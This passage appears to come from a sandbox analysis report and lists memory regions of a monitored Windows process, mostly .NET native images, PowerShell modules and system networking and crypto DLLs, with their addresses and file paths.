"\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Runteb92aa12#\\dea5e931cfb592ec8ceb386f87575456\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.runteb92aa12#\\dea5e931cfb592ec8ceb386f87575456\\system.runtime.serialization.ni.dll") Region: id = 582 start_va = 0x7ffbe1890000 end_va = 0x7ffbe18b4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\SMDiagnostics\\fec12741f35f039878753fdb29639f2c\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\smdiagnostics\\fec12741f35f039878753fdb29639f2c\\smdiagnostics.ni.dll") Region: id = 583 start_va = 0x7ffbca4f0000 end_va = 0x7ffbca5e1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Servd1dec626#\\193c832c4548f656b3e42825f211e823\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.servd1dec626#\\193c832c4548f656b3e42825f211e823\\system.servicemodel.internals.ni.dll") Region: id = 584 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 585 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 586 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 587 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 588 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 589 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 590 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 591 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 592 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 593 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 594 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 595 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 596 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 597 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 598 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 599 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 600 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 601 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 602 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 603 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 604 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 605 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 606 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 607 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 608 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 609 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 610 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 611 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 612 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 613 start_va = 0x1e351620000 end_va = 0x1e35162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351620000" filename = "" Region: id = 614 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 615 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 616 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 617 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 618 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 619 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 620 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 621 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 622 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 623 start_va = 0x7ffb709f0000 end_va = 0x7ffb709fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb709f0000" filename = "" Region: id = 624 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 625 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 626 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 627 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 628 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 629 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 630 start_va = 0x1e351620000 end_va = 0x1e35162ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351620000" filename = "" Region: id = 631 start_va = 0x1e351630000 end_va = 0x1e35163ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351630000" filename = "" Region: id = 632 start_va = 0x1e351640000 end_va = 0x1e35164ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351640000" filename = "" Region: id = 633 start_va = 0x7ffbc9bd0000 end_va = 0x7ffbca4e6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\180c5b058514424a5097dc9f075fe609\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\180c5b058514424a5097dc9f075fe609\\system.data.ni.dll") Region: id = 634 start_va = 0x7ffbc9870000 end_va = 0x7ffbc9bc3fff monitored = 1 entry_point = 0x7ffbc99b57fa region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 635 start_va = 0x7ffbed7a0000 end_va = 0x7ffbed80afff monitored = 0 entry_point = 0x7ffbed7b90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 636 start_va = 0x1e3515e0000 end_va = 0x1e35192bfff monitored = 1 entry_point = 0x1e3517257fa region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 637 start_va = 0x7ffb70a00000 end_va = 0x7ffb70a0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a00000" filename = "" Region: id = 638 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 639 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 640 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 641 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 642 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 643 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 644 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 645 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 646 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 647 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 648 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 649 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 650 start_va = 0xb1570d0000 end_va = 0xb15710ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b1570d0000" filename = "" Region: id = 651 start_va = 0xb157110000 end_va = 0xb15718ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157110000" filename = "" Region: id = 652 start_va = 0x1e3514a0000 end_va = 0x1e3514a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 653 start_va = 0x1e3515e0000 end_va = 0x1e351607fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 654 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 655 start_va = 0x7ffbc8b70000 end_va = 0x7ffbc9865fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\8b878fd07f8f5ac79252b31dbad69c30\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p521220ea#\\8b878fd07f8f5ac79252b31dbad69c30\\microsoft.powershell.commands.utility.ni.dll") Region: id = 656 start_va = 0x1e3514a0000 end_va = 0x1e3514a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 657 start_va = 0x1e3515e0000 end_va = 0x1e351607fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 658 start_va = 0x7ffb70a10000 end_va = 0x7ffb70a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a10000" filename = "" Region: id = 659 start_va = 0x7ffb70a20000 end_va = 0x7ffb70a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a20000" filename = "" Region: id = 660 start_va = 0x7ffb70a30000 end_va = 0x7ffb70a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a30000" filename = "" Region: id = 661 start_va = 0xb157190000 end_va = 0xb1571cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157190000" filename = "" Region: id = 662 start_va = 0x1e3514a0000 end_va = 0x1e3514a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 663 start_va = 0x1e3515e0000 end_va = 0x1e351607fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 664 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 665 start_va = 0x7ffb70a40000 end_va = 0x7ffb70a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb70a40000" filename = "" Region: id = 666 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 667 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 668 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 669 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 670 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 671 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 672 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 673 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 674 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 675 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 676 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 677 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 678 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 679 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 680 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 681 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 682 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 683 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 684 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 685 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 686 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 687 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 688 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 689 start_va = 0x1e351610000 end_va = 0x1e35161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351610000" filename = "" Region: id = 690 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 691 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 692 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 693 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 694 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 695 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 696 start_va = 0x1e3515e0000 end_va = 0x1e3515effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515e0000" filename = "" Region: id = 697 start_va = 0x1e3515f0000 end_va = 0x1e3515fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3515f0000" filename = "" Region: id = 698 start_va = 0x1e351600000 end_va = 0x1e35160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e351600000" filename = "" Region: id = 699 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 700 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 701 start_va = 0x1e3514a0000 end_va = 0x1e3514affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 702 start_va = 0x7ffbe2f40000 end_va = 0x7ffbe2f77fff monitored = 0 entry_point = 0x7ffbe2f58cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 703 start_va = 0x7ffbe89f0000 end_va = 0x7ffbe8a99fff monitored = 0 entry_point = 0x7ffbe8a17910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 704 start_va = 0x7ffbed810000 end_va = 0x7ffbed817fff monitored = 0 entry_point = 0x7ffbed811ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 705 start_va = 0x7ffbe2b70000 end_va = 0x7ffbe2b85fff monitored = 0 entry_point = 0x7ffbe2b719f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 706 start_va = 0x7ffbe2b50000 end_va = 0x7ffbe2b69fff monitored = 0 entry_point = 0x7ffbe2b52430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 707 start_va = 0x7ffbe2a50000 end_va = 0x7ffbe2a5afff monitored = 0 entry_point = 0x7ffbe2a51d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 708 start_va = 0x7ffbd50a0000 end_va = 0x7ffbd5159fff monitored = 0 entry_point = 0x7ffbd50a5d90 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 709 start_va = 0x7ffbe3030000 end_va = 0x7ffbe3057fff monitored = 0 entry_point = 0x7ffbe303c7c0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 710 start_va = 0x7ffbe30d0000 end_va = 0x7ffbe30e3fff monitored = 0 entry_point = 0x7ffbe30d2d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 711 start_va = 0x7ffbe9850000 end_va = 0x7ffbe98abfff monitored = 0 entry_point = 0x7ffbe9866f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 712 start_va = 0x1e3515e0000 end_va = 0x1e3516bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 713 start_va = 0xb1571d0000 end_va = 0xb15724ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b1571d0000" filename = "" Region: id = 714 start_va = 0x7ffbe5fc0000 end_va = 0x7ffbe6087fff monitored = 0 entry_point = 0x7ffbe60013f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 715 start_va = 0x7ffbe1a30000 end_va = 0x7ffbe1a44fff monitored = 0 entry_point = 0x7ffbe1a32dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 716 start_va = 0xb157250000 end_va = 0xb1572cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157250000" filename = "" Region: id = 717 start_va = 0x7ffbe1460000 end_va = 0x7ffbe1469fff monitored = 0 entry_point = 0x7ffbe14614c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 718 start_va = 0x7ffbe2980000 end_va = 0x7ffbe29e6fff monitored = 0 entry_point = 0x7ffbe29863e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 719 start_va = 0xb1572d0000 end_va = 0xb15730ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b1572d0000" filename = "" Region: id = 720 start_va = 0xb157310000 end_va = 0xb15738ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157310000" filename = "" Region: id = 721 start_va = 0xb157390000 end_va = 0xb1573cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000b157390000" filename = "" Region: id = 722 start_va = 0x1e3514a0000 end_va = 0x1e3514a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e3514a0000" filename = "" Region: id = 723 start_va = 0x7ffbe94d0000 end_va = 0x7ffbe9549fff monitored = 0 entry_point = 0x7ffbe94f1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 724 start_va = 0x1e3516c0000 end_va = 0x1e3516c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e3516c0000" filename = "" Region: id = 725 start_va = 0x7ffbdcf80000 end_va = 0x7ffbdcf93fff monitored = 0 entry_point = 0x7ffbdcf83710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 726 start_va = 0x7ffbe9af0000 end_va = 0x7ffbe9b16fff monitored = 0 entry_point = 0x7ffbe9b00aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 727 start_va = 0x7ffbe9ab0000 end_va = 0x7ffbe9ae9fff monitored = 0 entry_point = 